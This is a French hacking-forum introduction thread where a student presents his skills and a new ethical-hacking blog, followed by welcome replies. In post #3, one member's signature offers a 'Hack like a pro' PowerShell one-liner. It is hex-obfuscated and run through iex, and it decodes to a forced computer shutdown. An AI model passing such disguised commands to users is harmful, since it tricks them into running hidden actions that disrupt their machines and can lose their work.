Annonce

Réduire
Aucune annonce.

Petite présentation - Adriy1

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Petite présentation - Adriy1

    Pseudo (+autres si plusieurs) : Adriy1 (Adrien)

    Connaissances informatiques générales : C/Python/ HTML/CSS. J'ai aussi quelques bases en Javascript et en SQL

    Connaissances en hacking : Difficile à dire, je suis plutôt à l'aise avec les réseaux donc Wireshark Nmap etc... Je sais aussi utiliser Kali Linux

    Système d'exploitation principal : Ubuntu

    Je viens sur ce forum pour : Aider des personnes pour pouvoir moi aussi progresser. Selon moi on apprend en enseignant !

    J'ai connu ce forum via : Google

    Informations supplémentaires (job, intérêts, autres...) : Etudiant à L'ENSIMAG, je souhaite devenir entrepreneur ! J'aime aussi la musique (du bon rock !) et le sport.
    J'ai aussi créé un tout nouveau blog sur le hacking www.apprendrelehacking.fr. J'aimerais avec ce blog rendre le hacking éthique accessible à tout le monde. Si mes articles pouvaient sensibiliser le plus de monde possible à la sécurité informatique, j'en serais très fier !

    Hackmicalement Adriy1 !

  • #2
    Bienvenue Adriy1

    Commentaire


    • #3
      Bienvenue Adrien.

      Bravo pour ton blog plaisant à lire. J'aime bien ton approche qui consiste à rendre ce pan de culture accessible aux curieux qui ne disposent pas nécessairement de compétences avérées en la matière. C'est tout l'art de la sensibilisation du grand public à la SSI.

      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Merci beaucoup pour ce retour Krisscool, c'est l'un de mes tout premiers feedback. Tu as parfaitement résumé mon approche actuelle !
        Allez je retourne à l'écriture du nouvel article ! N'hésitez surtout pas si vous avez des critiques constructives

        Commentaire


        • #5
          Bienvenue, pas mal ton blog, d'ailleurs j'ai laissé un petit commentaire.

          Commentaire


          • #6
            Hello et bienvenue Adriy1!

            Commentaire

            Chargement...
            X